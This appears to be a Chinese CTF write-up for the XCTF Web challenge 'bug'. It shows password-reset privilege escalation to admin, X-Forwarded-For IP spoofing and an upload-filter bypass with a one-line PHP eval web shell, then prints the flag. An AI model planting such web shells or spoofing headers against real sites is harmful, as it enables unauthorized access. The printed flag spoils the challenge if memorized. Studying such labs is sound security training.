【愚公系列】2023年06月 攻防世界-Web(bug)

文章目录

  • 前言
  • 一、bug
    • 1.题目
    • 2.答题
      • 2.1 垂直越权
      • 2.2 IP绕过
      • 2.3 文件上传


前言

越权渗透是指黑客利用系统漏洞或者密码破解等手段,未经授权地进入目标系统获得权限。具体而言,越权渗透可以包括以下几种形式:

  1. 弱口令攻击:黑客通过暴力破解或者社工攻击等手段获取系统账号和密码,从而进入目标系统。

  2. 缓冲区溢出攻击:黑客利用系统中存在的缓冲区溢出漏洞,向目标系统注入恶意代码,从而获得系统权限。

  3. SQL注入攻击:黑客利用目标系统中存在的SQL注入漏洞,通过注入恶意SQL语句获取系统权限。

基本流程案例如下:

  1. 收集信息:黑客先通过信息搜集技术,获取目标系统的基本信息,包括IP地址、端口、服务等。

  2. 扫描目标:黑客通过端口扫描、漏洞扫描等技术,寻找目标系统中存在的漏洞和弱点。

  3. 获取权限:黑客利用发现的漏洞和弱点,进入目标系统,获取管理员或其他高权限账号。

  4. 掩盖痕迹:黑客在获取权限后,会尽可能地删除遗留的痕迹,包括日志记录和其他操作痕迹。

  5. 利用权限:黑客利用获取到的管理员或其他高权限账号,修改系统设置、获取重要数据等。

  6. 持久化攻击:黑客在获取权限后,会留下后门等恶意程序,以保持对目标系统的控制。

以上流程仅供参考,实际攻击可能会因系统环境、攻击者技术水平等因素而有所不同。

一、bug

1.题目

【愚公系列】2023年06月 攻防世界-Web(bug)_第1张图片

2.答题

2.1 垂直越权

打开链接发现注册,和找回密码,这应该就是越权

【愚公系列】2023年06月 攻防世界-Web(bug)_第2张图片

随便注册一个

【愚公系列】2023年06月 攻防世界-Web(bug)_第3张图片
回去进行登录,登录成功后,点击管理发现没权限
【愚公系列】2023年06月 攻防世界-Web(bug)_第4张图片
尝试越权修改密码 ,发现登录以后修改密码,不会带username

【愚公系列】2023年06月 攻防世界-Web(bug)_第5张图片

想到开始页面也有一个修改密码,这里有一个username,改为admin

【愚公系列】2023年06月 攻防世界-Web(bug)_第6张图片

【愚公系列】2023年06月 攻防世界-Web(bug)_第7张图片
【愚公系列】2023年06月 攻防世界-Web(bug)_第8张图片
进行admin登录
【愚公系列】2023年06月 攻防世界-Web(bug)_第9张图片

2.2 IP绕过

继续尝试访问manage页面,但提示ip不允许
【愚公系列】2023年06月 攻防世界-Web(bug)_第10张图片
尝试通过x-forwarded-for:127.0.0.1来伪造ip
【愚公系列】2023年06月 攻防世界-Web(bug)_第11张图片

【愚公系列】2023年06月 攻防世界-Web(bug)_第12张图片
查看源码
【愚公系列】2023年06月 攻防世界-Web(bug)_第13张图片

ctf总共就几个知识点,猜测xss,sql,ssrf,upload

index.php?module=filemanage&do=upload

【愚公系列】2023年06月 攻防世界-Web(bug)_第14张图片
访问得到上传文件页面

2.3 文件上传

直接上传图片马,连.png结尾的都上传不了,说明服务器会对图片内容进行检测。

1.mime检测;
2.大小写绕过;
3.等价替换(php5,php3)
4.也是本题的考点,利用JavaScript执行php代码(正常的php代码会被检测到,所以就考虑用JavaScript来执行)

<script language="php"> @eval$_POST['cmd']); </script>

【愚公系列】2023年06月 攻防世界-Web(bug)_第15张图片
得到flag:cyberpeace{e47728885a9e63d080b7c0d008dceb0a}

你可能感兴趣的:(#,CTF-攻防世界-WEB,bug,web安全,网络,网络安全)